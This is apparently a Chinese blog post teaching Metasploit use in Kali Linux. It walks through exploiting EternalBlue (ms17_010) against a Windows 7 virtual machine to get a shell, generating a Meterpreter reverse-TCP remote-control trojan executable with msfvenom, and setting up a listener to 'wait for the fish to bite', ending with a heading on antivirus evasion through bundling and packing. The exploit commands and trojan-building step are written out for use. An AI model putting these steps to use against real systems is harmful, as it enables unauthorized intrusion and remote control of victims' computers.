使用 kali msf 进行渗透测试

启动方法:

kali 终端命令行键入

msfconsole
# Eternal blue

该漏洞编号为 ms17_010

search ms17_010

search 命令可查看关于该漏洞的相关模块

如下图所示

1

01 为攻击模块 23 为辅助模块,使用 0

usr 0

然后对此攻击进行配置

show options

2

其中 RHOSTS 为被攻击方 IP,相应属性后方都有描述

例如。我开了一台 win7 的虚拟机 然后 ipconfig 查看 IP 为 192.168.159.130

set RHOSTS 192.168.159.130

低版本注意配置 payload

配置完成后 run

run

攻击成功显示

3

进入后即可随意而为

比如输入 shell

4

键入 help 也可查看相关操作

# msf 生成远控木马

利用 msfveno 模块来生成远控

-p payload windows/x64/meterpreter/reverse_tcp 为系统 / 架构 / 作用 / 方式 后变为 payload 设置,-f 格式 -o 输出形式

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.131 lport=9999 -f exe -o demo.exe
# 设置鱼钩(监听)

使用 handler 模块

use exploit/multi/handler

配置 options

要求 payload,lhost,lport 与木马一致

5

完成后即可等待鱼儿上钩

如下图,我进入了一台 WIN11 系统主机

并且建立了一个 Hello.txt

6

其他骚操作可自行 help 查看

# 免杀(持续更新检测)

捆绑

装壳

更新于

请我喝[茶]~( ̄▽ ̄)~*

Lx1A0ql5 微信支付

微信支付

Lx1A0ql5 支付宝

支付宝

Lx1A0ql5 贝宝

贝宝